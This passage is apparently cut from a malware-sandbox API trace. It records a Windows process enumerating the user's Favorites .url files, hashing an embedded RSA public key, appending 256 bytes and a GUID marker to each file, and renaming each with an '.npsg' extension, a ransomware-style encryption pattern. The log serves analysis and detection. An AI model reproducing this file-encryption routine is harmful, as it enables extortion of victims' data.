KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.966] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.967] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.967] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.967] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.967] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.967] GetLastError () returned 0x0 [0237.967] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.967] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.967] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.967] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.967] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.967] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.968] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.968] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.968] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.968] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.969] CloseHandle (hObject=0x644) returned 1 [0237.969] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0237.970] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0237.970] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d7c0 | out: hHeap=0x620000) returned 1 [0237.970] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.npsg")) returned 1 [0237.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.971] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70e008 | out: hHeap=0x620000) returned 1 [0237.972] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0237.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.972] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70e008 [0237.972] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.973] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned=".url" [0237.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.974] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0237.974] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.977] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.977] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.978] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.978] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.978] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0237.979] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.979] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.979] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.979] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.979] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.980] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.980] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.980] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.980] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.980] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.980] GetLastError () returned 0x0 [0237.980] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.980] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.980] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.980] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.981] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.981] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.981] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.981] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.982] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.982] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.982] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.982] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.982] CloseHandle (hObject=0x644) returned 1 [0237.985] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.npsg")) returned 1 [0237.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.986] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.986] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70e008 | out: hHeap=0x620000) returned 1 [0237.988] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0237.988] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned=".url" [0237.988] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.988] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0237.988] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.991] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.991] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.994] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0237.994] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.994] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.994] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.994] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.995] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.995] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.995] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.995] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.995] GetLastError () returned 0x0 [0237.995] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.995] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.996] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.996] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.996] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.996] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x34097e8 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400800 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409830 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400818 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400848 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008a8 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400860 [0237.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.997] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400848 | out: hHeap=0x620000) returned 1 [0237.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400860 | out: hHeap=0x620000) returned 1 [0237.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008a8 | out: hHeap=0x620000) returned 1 [0237.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008a8 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400860 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400848 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0237.997] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400860 | out: hHeap=0x620000) returned 1 [0237.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400848 | out: hHeap=0x620000) returned 1 [0237.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008a8 | out: hHeap=0x620000) returned 1 [0237.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0237.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.998] GetCurrentThreadId () returned 0x5b4 [0237.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b83008 [0237.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0237.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.998] GetCurrentThreadId () returned 0x5b4 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0237.999] 